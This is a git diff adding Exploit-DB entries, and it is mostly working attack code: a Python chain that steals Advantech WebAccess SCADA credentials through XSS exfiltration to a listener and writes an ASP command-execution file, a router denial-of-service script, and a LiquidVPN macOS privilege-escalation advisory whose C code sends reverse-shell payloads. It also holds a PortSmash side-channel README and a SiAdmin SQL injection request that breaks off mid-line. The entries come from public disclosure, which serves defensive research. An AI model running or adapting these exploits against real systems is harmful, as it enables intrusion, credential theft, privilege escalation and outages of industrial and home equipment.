diff --git a/exploits/asp/webapps/45774.py b/exploits/asp/webapps/45774.py new file mode 100755 index 000000000..103fb28e0 --- /dev/null +++ b/exploits/asp/webapps/45774.py @@ -0,0 +1,303 @@ +# Exploit Title: Advantech WebAccess SCADA 8.3.2 - Remote Code Execution +# Date: 2018-11-02 +# Exploit Author: Chris Lyne (@lynerc) +# Vendor Homepage: http://www.advantech.com +# Device: NRVMini2 +# Software Link: http://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-1MDG1BH +# Version: 8.3.2 +# Tested on: Windows Server 2008 R2 +# CVE: CVE-2018-15705, CVE-2018-15707 +# TRA: https://www.tenable.com/security/research/tra-2018-35 +# Description: +# +# This code exploits two vulnerabilities to gain remote code execution +# with Administrator privileges: +# +# 1) CVE-2018-15707 to steal credentials (XSS). User-interaction required. +# 2) CVE-2018-15705 to write an ASP file to the server. + +from http.server import HTTPServer, BaseHTTPRequestHandler +from base64 import decodestring +import re +import requests, urllib, json +import sys +import argparse + +TIMEOUT = 5 # sec + +def err_and_exit(msg): + print '\n\nERROR: ' + msg + '\n\n' + sys.exit(1) + +# WADashboard client +class WsClient: + def __init__(self, ip, port, https=False): + self.ip = ip + self.port = port + self.https = https + + self.endpoint = 'https' if https else 'http' + self.endpoint += '://' + ip + ':' + str(port) + self.endpoint += '/WADashboard' + + # see if service is up + def grab_projects(self): + url = self.endpoint + '/api/dashboard/v6/waConfig/getWebAccessProjectList' + r = requests.get(url, timeout=TIMEOUT) + if "resString" in r.text: + json_decoded = json.loads(r.text) + if json_decoded['resString'] is not None and len(json_decoded['resString']) > 0: + return json_decoded['resString'] + return None + + # success if we get cookies + def login(self, projectName, user, pw): + # issue a login request and set the cookies + # POST /WADashboard/login?cont=dashboardViewer + # projectName1=myproject&username=admin&password=hello&recId= + url = self.endpoint + '/login?cont=dashboardViewer' + data = { + 'projectName1' : projectName, + 'username' : user, + 'password' : pw, + 'recId' : '' + } + r = requests.post(url, data, timeout=TIMEOUT) + if len(r.cookies) > 0: + self.cookies = r.cookies + return True # success + else: + return False # fail + + def write_file(self, filename, contents): + # /WADashboard/api/dashboard/v1/files/writeFile?projectSpecies=myproject!savedConfiguration&folderpath=../../../../exec.asp&msg=contents&overwrite=true + + # post the writeFile request + # for some reason, the data is required in the query string instead of POST data + url = self.endpoint + '/api/dashboard/v1/files/writeFile' + data = { + 'projectSpecies' : victim['project'] + '!savedConfiguration', + 'folderpath' : '../../../../' + filename, # uploads to /Broadweb/ folder + 'msg' : contents, + 'overwrite' : 'true' + } + + url += '?' + urllib.urlencode(data) + r = requests.post(url, cookies=self.cookies, timeout=TIMEOUT) + return (r.status_code == 200) + +# This class will serve as an HTTP listener +class MyWebHandler(BaseHTTPRequestHandler): + def do_GET(self): + + data = self.path.replace('/', '') # remove leading slash + decoded = decodestring(data) + + print "\n***LINK CLICKED!***" + + try: + # carve out the piece we want to match + i = decoded.index('logOnWebService') + k = decoded.index('readNodeStatus') + chunk = decoded[i:k] + + # find our match + regex = '^logOnWebService\\("(.+)", "(.*)"\\);.*' + m = re.match(regex, chunk) + + if not m: + err_and_exit("Couldn't extract credentials...") + + print "\nCredentials stolen..." + user = m.group(1) + pw = m.group(2) + print "- User: " + user + print "- Pass: " + pw + + # login to WADashboard + if not client.login(victim['project'], user, pw): + err_and_exit("Credentials didn't work...") + + print '\nLogged into WADashboard with credentials.' + + # write malicious ASP file + asp_payload = '<% Set t=Server.CreateObject("webdobj.webdraw"):t.RemoteWinExec Request.QueryString("p"),Request.QueryString("n"),Request.QueryString("c"):Response.Write "Done."%>' + filename = 'exec.asp' + if not client.write_file(filename, asp_payload): + err_and_exit("Write file failed...") + + print "\n'" + filename + "' written to disk." + + # execute OS command + url = broadweb_root + '/' + filename + data = { + 'p' : victim['project'], + 'n' : victim['node'], + 'c' : victim['cmd'] + } + + url += '?' + urllib.urlencode(data) + r = requests.get(url, timeout=TIMEOUT) # no cookie needed + if r.status_code == 200: + print "\nSuccessful request to '" + url + "'\n" + else: + print "\nThere may be something wrong with the ASP payload.\n" + + print "\nDone!" + except Exception as e: + print "Exception encountered: " + str(e) + + msg = 'hello poppet' + + self.send_response(200) + self.end_headers() + self.wfile.write(str.encode(msg)) + +# MAIN + +# deal with command line flags +desc = '''This exploit targets Advantech WebAccess/SCADA 8.3.2. It has been tested against Windows 2008 R2 x64. + +The goal of the script is to execute code remotely. User interaction is required. + +The following operations will be conducted: +1) Ensure WebAccess application is running. (TCP port 80 by default) +2) Ensure WADashboard is running. (TCP port 8081 by default) +3) Ensure user-specified project exists. +4) Ensure user-specified node exists. +5) Generate malicious link to send to victim user. (exploits CVE-2018-15707 to steal credentials via XSS) +6) Start HTTP listener to receive credentials when victim clicks the link. +7) Login to WADashboard. +8) Write a malicious ASP file to the root of the WebAccess application. (exploits CVE-2018-15705) +Note: elevated privileges will be obtained using the Webdraw RemoteWinExec function. +9) Execute user-specified command. + +Example (equivalent) commands: +python script.py -t 192.168.0.2 -p1 80 -p2 8081 -https false -proj myproject -node mynode -ip 192.168.0.3 -port 9999 -cmd calc.exe +python script.py -t 192.168.0.2 -proj myproject -node mynode -ip 192.168.0.3 -cmd calc.exe +''' + +arg_parser = argparse.ArgumentParser(description=desc) +arg_parser.add_argument('-t', required=True, help='Target IP (Required)') +arg_parser.add_argument('-p1', type=int, default=80, help='WebAccess Port (Default: 80)') +arg_parser.add_argument('-p2', type=int, default=8081, help='WADashboard Port (Default: 8081)') +arg_parser.add_argument('-https', type=bool, default=False, help='HTTPS (Default: false)') +arg_parser.add_argument('-proj', required=True, help='Project name') +arg_parser.add_argument('-node', required=True, help='Node name') +arg_parser.add_argument('-ip', required=True, help='HTTP listener IP') +arg_parser.add_argument('-port', type=int, default=9999, help='HTTP listener port (Default: 9999)') +arg_parser.add_argument('-cmd', required=True, help='OS command to be executed') + +args = arg_parser.parse_args() + +# victim settings +victim = dict() +victim['ip'] = args.t +victim['web_port'] = args.p1 # Broadweb web app port +victim['ws_port'] = args.p2 # WADashboard Node.js service port +victim['https'] = args.https +victim['project'] = args.proj +victim['node'] = args.node +victim['cmd'] = args.cmd + +# listener settings +listener = dict() +listener['ip'] = args.ip +listener['port'] = args.port + +# validate IP addresses +ip_pattern = "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+" +for ip in [victim['ip'], listener['ip']]: + match = re.match(ip_pattern, ip) + if match is None: + print "\nError: IP Address is invalid: '" + ip + "'.\n" + arg_parser.print_help() + sys.exit(1) + +# start the real work +# ensure WebAccess ASP application is running +print "\nPerforming some banner checks to ensure services are running...\n" +proto = 'https' if victim['https'] else 'http' +broadweb_root = proto + '://' + victim['ip'] +# no need to add port if it's 80 or 443 +https = victim['https'] +if (https and victim['web_port'] != 443) or (victim['web_port'] != 80 and not https): + broadweb_root += ':' + str(victim['web_port']) +broadweb_root += '/broadWeb' +url = broadweb_root + '/bwRoot.asp' + +try: + r = requests.get(url, timeout=TIMEOUT) +except requests.exceptions.ConnectionError as e: + err_and_exit('Cannot reach host ' + victim['ip'] + ' on port ' + str(victim['web_port'])) + +if 'Welcome to Advantech WebAccess' not in r.text: + err_and_exit('WebAccess not found.') + +print 'WebAccess is up.' + +# ensure WADashboard Node.js service is running +# and projects are defined +client = WsClient(victim['ip'], victim['ws_port'], https=https) + +try: + projects = client.grab_projects() +except requests.exceptions.ConnectionError as e: + err_and_exit('Cannot reach host ' + victim['ip'] + ' on port ' + str(victim['ws_port'])) + +if not projects: + err_and_exit('Dashboard Viewer not found.') + +print "Dashboard Viewer is up." + +if len(projects) == 0: + err_and_exit("No projects found...") + +print "\nFound projects: " +for project in projects: + print " - " + project + +# ensure specified project exists +if victim['project'] not in projects: + err_and_exit("Specified project, " + victim['project'] + " was not found...") + +print "Specified project '" + victim['project'] + "' exists." + +# ensure nodes are defined for project +# we have to specify a node name to run the custom RemoteWinExec() function +url = broadweb_root + '/' + victim['project'] +'.dpj' +r = requests.get(url, timeout=TIMEOUT) +node_list = list() +if "[nodelist]" in r.text: + for line in r.text.split('\n'): + regex = "^node[0-9]=(.*)$" + m = re.match(regex, line, flags=re.MULTILINE) + if m: + node_list.append(m.group(1).strip()) + +if len(node_list) == 0: + err_and_exit("No nodes found...") + +print "\nFound nodes: " +for node in node_list: + print ' - ' + node + +if victim['node'] not in node_list: + err_and_exit("Node, " + victim['node'] + " not in node list...") + +print "Specified node '" + victim['node'] + "' exists." + +# generate link to send to victim +print "\nSend this link to the victim:" +print "Keep in mind, they could be logged in via localhost." +link = broadweb_root + '/bwmainleft.asp?pid=1&pname=");i=document.createElement(\'img\');' +link += 'i.src="http://' + listener['ip'] + ':' + str(listener['port']) + '/' +link += '"%2bbtoa(document.getElementsByTagName(\'script\')[4].text);//' + +print link + +# start listener +print "\nListening on " + listener['ip'] + ":" + str(listener['port']) +print "Waiting for victim to click link..." +httpd = HTTPServer((listener['ip'], listener['port']), MyWebHandler) +httpd.handle_request() \ No newline at end of file diff --git a/exploits/hardware/local/45785.md b/exploits/hardware/local/45785.md new file mode 100644 index 000000000..bb45d5e81 --- /dev/null +++ b/exploits/hardware/local/45785.md @@ -0,0 +1,122 @@ +# Summary + +This is a proof-of-concept exploit of the PortSmash microarchitecture attack, tracked by CVE-2018-5407. + +![Alt text](parse_raw_simple.png?raw=true "Title") + +# Setup + +## Prerequisites + +A CPU featuring SMT (e.g. Hyper-Threading) is the only requirement. + +This exploit code should work out of the box on Skylake and Kaby Lake. For other SMT architectures, customizing the strategies and/or waiting times in `spy` is likely needed. + +## OpenSSL + +Download and install OpenSSL 1.1.0h or lower: + + cd /usr/local/src + wget https://www.openssl.org/source/openssl-1.1.0h.tar.gz + tar xzf openssl-1.1.0h.tar.gz + cd openssl-1.1.0h/ + export OPENSSL_ROOT_DIR=/usr/local/ssl + ./config -d shared --prefix=$OPENSSL_ROOT_DIR --openssldir=$OPENSSL_ROOT_DIR -Wl,-rpath=$OPENSSL_ROOT_DIR/lib + make -j8 + make test + sudo checkinstall --strip=no --stripso=no --pkgname=openssl-1.1.0h-debug --provides=openssl-1.1.0h-debug --default make install_sw + +If you use a different path, you'll need to make changes to `Makefile` and `sync.sh`. + +# Tooling + +## freq.sh + +Turns off frequency scaling and TurboBoost. + +## sync.sh + +Sync trace through pipes. It has two victims, one of which should be active at a time: + +1. The stock `openssl` running `dgst` command to produce a P-384 signature. +2. A harness `ecc` that calls scalar multiplication directly with a known key. (Useful for profiling.) + +The script will generate a P-384 key pair in `secp384r1.pem` if it does not already exist. + +The script outputs `data.bin` which is what `openssl dgst` signed, and you should be able to verify the ECDSA signature `data.sig` afterwards with + + openssl dgst -sha512 -verify secp384r1.pem -signature data.sig data.bin + +In the `ecc` tool case, `data.bin` and `secp384r1.pem` are meaningless and `data.sig` is not created. + +For the `taskset` commands in `sync.sh`, the cores need to be two logical cores of the same physical core; sanity check with + + $ grep '^core id' /proc/cpuinfo + core id : 0 + core id : 1 + core id : 2 + core id : 3 + core id : 0 + core id : 1 + core id : 2 + core id : 3 + +So the script is currently configured for logical cores 3 and 7 that both map to physical core 3 (`core_id`). + +## spy + +Measurement process that outputs measurements in `timings.bin`. To change the `spy` strategy, check the port defines in `spy.h`. Only one strategy should be active at build time. + +Note that `timings.bin` is actually raw clock cycle counter values, not latencies. Look in `parse_raw_simple.py` to understand the data format if necessary. + +## ecc + +Victim harness for running OpenSSL scalar multiplication with known inputs. Example: + + ./ecc M 4 deadbeef0123456789abcdef00000000c0ff33 + +Will execute 4 consecutive calls to `EC_POINT_mul` with the given hex scalar. + +## parse_raw_simple.py + +Quick and dirty hack to view 1D traces. The top plot is the raw trace. Everything below is a different digital filter of the raw trace for viewing purposes. Zoom and pan are your friends here. + +You might have to adjust the `CEIL` variable if the plots are too aggressively clipped. + +Python packages: + + sudo apt-get install python-numpy python-matplotlib + +# Usage + +Turn off frequency scaling: + + ./freq.sh + +Make sure everything builds: + + make clean + make + +Take a measurement: + + ./sync.sh + +View the trace: + + python parse_raw_simple.py timings.bin + +You can play around with one victim at a time in `sync.sh`. Sample output for the `openssl dgst` victim is in `parse_raw_simple.png`. + +# Credits + +* Alejandro Cabrera Aldaya (Universidad Tecnológica de la Habana (CUJAE), Habana, Cuba) +* Billy Bob Brumley (Tampere University of Technology, Tampere, Finland) +* Sohaib ul Hassan (Tampere University of Technology, Tampere, Finland) +* Cesar Pereida García (Tampere University of Technology, Tampere, Finland) +* Nicola Tuveri (Tampere University of Technology, Tampere, Finland) + + + + +EDB Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45785.zip \ No newline at end of file diff --git a/exploits/hardware/webapps/45776.py b/exploits/hardware/webapps/45776.py new file mode 100755 index 000000000..42fb27276 --- /dev/null +++ b/exploits/hardware/webapps/45776.py @@ -0,0 +1,101 @@ +# Exploit Title: Virgin Media Hub 3.0 Router - Denial of Service (PoC) +# Google Dork: N/A +# Date: 2018-11-03 +# Exploit Author: Ross Inman +# Vendor Homepage: https://www.broadbandchoices.co.uk/guides/hardware/virgin-media-broadband-routers +# Software Link: N/A +# Version: Virgin Media Hub 3.0 +# Tested on: Linux +# CVE : N/A + +#!/usr/bin/python2.7 + +import socket, sys, random, os + +user_agents = [ + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0", + "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0", +] + +def connection(ip,port): + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.settimeout(1) + test = s.connect_ex((ip,port)) + s.close() + if(test == 0): + return True + else: + return False + +def dos(ip,port): + socks = [] + payload = """ +POST / HTTP/1.1\ +Host: {} +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +User-Agent: {} +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-GB,en-US;q=0.8,en;q=0.6 + """.format(ip,random.choice(user_agents)) + with open("/tmp/payload.txt","w") as f: + f.write(payload) + f.close() + with open("/tmp/payload.txt","r") as f: + lines = f.readlines() + f.close() + os.remove("/tmp/payload.txt") + while(True): + try: + sys.stdout.write("\r[Info]Sending packets => {}".format(ip)) + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.connect((ip,port)) + for line in lines: + s.send(line) + socks.append(s) + except KeyboardInterrupt: + print"\n[Info]Closing connections..." + for sock in socks: + sock.close() + socks.remove(sock) + sys.exit(0) + +def main(): + if(len(sys.argv) != 3): + sys.exit("Usage: ./dos.py {target ip} {port}") + else: + target = sys.argv[1] + port = int(sys.argv[2]) + print"[Info]Checking connection to target..." + check = connection(target,port) + if(not check): + sys.exit("[Failure]Connection to target failed.") + print"[Info]Starting attack on: {}".format(target) + dos(target,port) + +if(__name__ == "__main__"): + main() \ No newline at end of file diff --git a/exploits/json/webapps/45783.html b/exploits/json/webapps/45783.html new file mode 100644 index 000000000..d47455794 --- /dev/null +++ b/exploits/json/webapps/45783.html @@ -0,0 +1,126 @@ + + + + + RoyalTS/X Exploit + + +

RoyalTS/X Exploit

+ +
+ + \ No newline at end of file diff --git a/exploits/macos/local/45782.c b/exploits/macos/local/45782.c new file mode 100644 index 000000000..350083ade --- /dev/null +++ b/exploits/macos/local/45782.c @@ -0,0 +1,312 @@ +/* +======================================================================= +Title: Multiple Privilege Escalation Vulnerabilities +Product: LiquidVPN for MacOS +Vulnerable versions: 1.37, 1.36 and earlier +CVE ID(s): CVE-2018-18856, CVE-2018-18857, CVE-2018-18858, CVE-2018-18859 +Impact: Critical +Homepage: https://www.liquidvpn.com +Identified: 2018-09-29 +By: Bernd Leitner (bernd.leitner [at] gmail dot com) +======================================================================= + +Vendor description: +------------------- +"LiquidVPN creates a secure encrypted link between your device and the +Internet. +When you connect to the Internet from your home, mobile device, office or a +WiFi +hotspot with encryption your traffic can’t be monitored by 3rd parties like +your +ISP. Without encryption, your ISP can store information about the websites +you +use and sell that data to anyone willing to pay for it. Some ISPs even +inject +advertisements into web pages to further profit off of the Internet service +you +pay for." + +Source: https://www.liquidvpn.com + + +Business recommendation: +------------------------ +By exploiting the vulnerabilities documented in this advisory, an attacker +can fully compromise a MacOS system with an installation of the LiquidVPN +client. + +Users are urged to uninstall the application until the vendor ships a new +version +of the LiquidVPN client. + + +Vulnerability overview/description: +----------------------------------- +LiquidVPN installs the helper tool "com.smr.liquidvpn.OVPNHelper" for +performing +privileged (root) actions. In order to allow other LiquidVPN components to +send +messages to the helper tool, it implements an XPC service. Static code +analysis +showed, that the XPC service does not filter incoming messages. This means, +regular users (local attackers) can craft arbitrary XPC messages and send +them +to the service. This leads to the following issues: + + +1) "anycmd" Privilege Escalation (reserved CVE-2018-18857) + +After receiving a message, the service checks for the existence of the +"anycmd" parameter: + +============================================================================================ +... +__text:00000001000012E8 lea rsi, aAnycmd ; "anycmd" +__text:00000001000012EF mov rdi, r14 ; char * +__text:00000001000012F2 call _strcmp +__text:00000001000012F7 test eax, eax +__text:00000001000012F9 jnz loc_1000016C2 +__text:00000001000012FF mov [rbp+var_10A38], r15 +__text:0000000100001306 lea rsi, aCommandLine ; +"command_line" +__text:000000010000130D mov rdi, rbx +... +__text:0000000100001336 lea rsi, aR ; "r" +__text:000000010000133D mov rdi, r14 ; char * +__text:0000000100001340 call _popen +... +============================================================================================ + +If "anycmd" is found, the "command_line" parameter is extracted from the +message +and directly passed on to a call to popen() as an argument. + + +2) "openvpncmd" Privilege Escalation (reserved CVE-2018-18856) + +Similar to the previous vulnerability, the service checks if the "openvpn" +parameter exists. If it does, the "openvpncmd" parameter is extracted and +passed +on to a system() call as an argument: + +============================================================================================ +... +__text:00000001000013F1 lea rsi, aOpenvpncmd ; +"openvpncmd" +__text:00000001000013F8 mov rdi, rbx +__text:00000001000013FB call _xpc_dictionary_get_string +... +__text:000000010000166A mov rdi, r15 ; char * +__text:000000010000166D call _system +__text:0000000100001672 lea rsi, aReply ; "reply" +__text:0000000100001679 lea rdx, aOpenvpnCommand ; +"openvpn command executed (ver 3)" +__text:0000000100001680 mov rdi, r12 +__text:0000000100001683 call _xpc_dictionary_set_string +... +============================================================================================ + +3) OS Command Injection (reserved CVE-2018-18858) + +If the service detects the "openvpn" parameter in a message, it also checks +if +the parameters "tun_path" or "tap_path" exist. If one of them (or both) +are found, +the values are used as source paths for a copy process using the system() +function. +However, the paths are not sanitized before being passed to system(): + +============================================================================================ +... +__text:00000001000013CD lea rsi, aPathTun ; "path_tun" +__text:00000001000013D4 mov rdi, rbx +__text:00000001000013D7 call _xpc_dictionary_get_string +__text:00000001000013DC mov r14, rax +__text:00000001000013DF lea rsi, aPathTap ; "path_tap" +__text:00000001000013E6 mov rdi, rbx +__text:00000001000013E9 call _xpc_dictionary_get_string +... +__text:000000010000143F call _strcat +__text:0000000100001444 mov rdi, rbx ; char * +__text:0000000100001447 call _strlen +... +__text:0000000100001497 mov rdi, rbx ; char * +__text:000000010000149A call _system +.. +============================================================================================ + +4) Loading of arbitrary Kernel Extensions (reserved CVE-2018-18859) + +The previous vulnerability can also be used to directly install an arbitrary +kernel extension. When the client is installed, "tun_path" and "tap_path" +are +pointed to the application folder for installing +"/Applications/LiquidVPN.app/Contents/Resources/tun.kext" and +"/Applications/LiquidVPN.app/Contents/Resources/tap.kext". +By crafting an XPC message containing attacker controlled kernel extension +paths, +the helper tool installs the kernel extensions using a call to the system +function +kextload(). Note: Since MacOS 10.13, a Kext needs to be signed. In +adddition to that, +Apple introduced user-approval for installing third party kernel +extensions. However, +as an attacker has local access to the system and user-approval does not +require the +user to enter a root or admin password, this is not a problem. + + +Proof of concept: +----------------- +The following proof of concepts can be used to execute arbitrary system +commands: + +1) "anycmd" Privilege Escalation + +============================================================================================ +... +xpc_dictionary_set_string(message, "cmd", "anycmd"); +xpc_dictionary_set_bool(message, "blocking", FALSE); +xpc_dictionary_set_string(message, "command_line", "[ARBITRARY CMD]"); +... +============================================================================================ + +2) "openvpncmd" Privilege Escalation + +============================================================================================ +... +xpc_dictionary_set_string(message, "cmd", "openvpn"); +xpc_dictionary_set_string(message, "openvpncmd", "[ARBITRARY CMD]"); +... +============================================================================================ + +3) OS Command Injection + +============================================================================================ +... +xpc_dictionary_set_string(message, "cmd", "openvpn"); +xpc_dictionary_set_string(message, "path_tun", "/tmp/__dummy00_;[ARBITRARY +CMD]"); +... +============================================================================================ + +4) Loading of arbitrary Kernel Extensions + +============================================================================================ +... +xpc_dictionary_set_string(message, "cmd", "openvpn"); +xpc_dictionary_set_string(message, "path_tun", "[PATH TO KEXT]"); +... +============================================================================================ + + +Vulnerable / tested versions: +----------------------------- +The following version has been tested and found to be vulnerable: +1.37 (most recent) and 1.36. + +Earlier versions might be vulnerable as well. + + +Vendor contact timeline: +------------------------ +2018-10-04: Requested security contact via twitter @LiquidVPN +2018-10-11: Contacted vendor through dave@liquidvpn.com +2018-10-11: Sent PGP encrypted advisory ( +https://my.liquidvpn.com/canary/syswan) +2018-10-17: Requested status update from vendor +2018-10-30: Sent new contact details & public PGP key to dave@liquidvpn.com +2018-10-30: Received vendor notification: + No patches will be issued as the LiquidVPN client for MacOS +will be + replaced by new app in the future +2018-10-31: Published to Full Disclosure Mailing List + +Solution: +--------- +None. + + +Workaround: +----------- +None. + + +EOF B. Leitner / @2018 +*/ + +// start netcat listener on port 9999 + +#include +#include +#include +#include + +void what(const char *bin) { + printf("%s <1-4>\n", bin); + printf("[1] Privesc (local reverse shell on port 9999 via \"anycmd\")\n"); + printf("[2] Privesc (local reverse shell on port 9999 via \"openvpncmd\")\n"); + printf("[3] Privesc (local reverse shell on port 9999 via OS command injection)\n"); + printf("[4] KEXT (load arbitrary kernel extension from /tmp/tun.kext (has to be signed for MacOS >= 10.13))\n"); +} + +int main(int argc, const char *argv[]) { + + if (argc == 1 || argc > 2) { + what(argv[0]); + return 0; + } + + int option = atoi(argv[1]); + xpc_object_t message = xpc_dictionary_create(NULL, NULL, 0); + + switch(option) { + case 1: + // "anycmd" + xpc_dictionary_set_string(message, "cmd", "anycmd"); + xpc_dictionary_set_bool(message, "blocking", FALSE); + xpc_dictionary_set_string(message, "command_line", "bash -i >& /dev/tcp/127.0.0.1/9999 0>&1"); + break; + case 2: + // "openvpncmd" + xpc_dictionary_set_string(message, "cmd", "openvpn"); + xpc_dictionary_set_string(message, "openvpncmd", "bash -i >& /dev/tcp/127.0.0.1/9999 0>&1"); + break; + case 3: + // cmd injection via "path_tun". "path_tap" is affected by the same bug + mkdir("/tmp/__dummy00_", 0755); + xpc_dictionary_set_string(message, "cmd", "openvpn"); + xpc_dictionary_set_string(message, "path_tun", "/tmp/__dummy00_;bash -i >& /dev/tcp/127.0.0.1/9999 0>&1;cat"); + rmdir("/tmp/__dummy00_"); + break; + case 4: + // load arbitrary kext via "path_tun". "path_tap" is affected by the same bug + xpc_dictionary_set_string(message, "cmd", "openvpn"); + xpc_dictionary_set_string(message, "path_tun", "/tmp/tun.kext"); + break; + default: + what(argv[0]); + return 0; + } + + printf("[+] sending xpc message.\n"); + + xpc_connection_t connection = xpc_connection_create_mach_service("com.smr.liquidvpn.OVPNHelper", NULL, 0); + if (connection == NULL) { + printf("[-] connection to xpc service failed.\n"); + return 1; + } + + xpc_connection_set_event_handler(connection, ^(xpc_object_t e) { + // we don't need that here. + }); + + xpc_connection_resume(connection); + + printf("[+] check your listener.\n"); + xpc_object_t result = xpc_connection_send_message_with_reply_sync(connection, message); + + printf("[+] bye.\n"); + + return 0; +} \ No newline at end of file diff --git a/exploits/php/webapps/45773.txt b/exploits/php/webapps/45773.txt new file mode 100644 index 000000000..739640b16 --- /dev/null +++ b/exploits/php/webapps/45773.txt @@ -0,0 +1,59 @@ +# Exploit Title: SiAdmin 1.1 - 'id' SQL Injection +# Dork: N/A +# Date: 2018-11-04 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.bubul.net/ +# Software Link: https://kent.dl.sourceforge.net/project/siadmin/SiAdmin%201.1/SiAdmin%201.1.zip +# Version: 1.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/modul/mod_beasiswa/print.php?op=print&id=[SQL] +# +GET /[PATH]/modul/mod_beasiswa/print.php?op=print&id=-4%27%20%20UNION%20%20SELECT%201,2,3,4,5,6,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),8--%20- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=va3kfka1v4dqvadpkdpm7f7vs0 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 04 Nov 2018 13:22:52 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: private, max-age=0, must-revalidate +Pragma: public +Content-Disposition: inline; filename="Ansanwan-Laporan.pdf" +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: application/pdf + +# POC: +# 2) +# http://localhost/[PATH]/show.php?op=beasiswa&act=lihat&id=[SQL] +# +GET 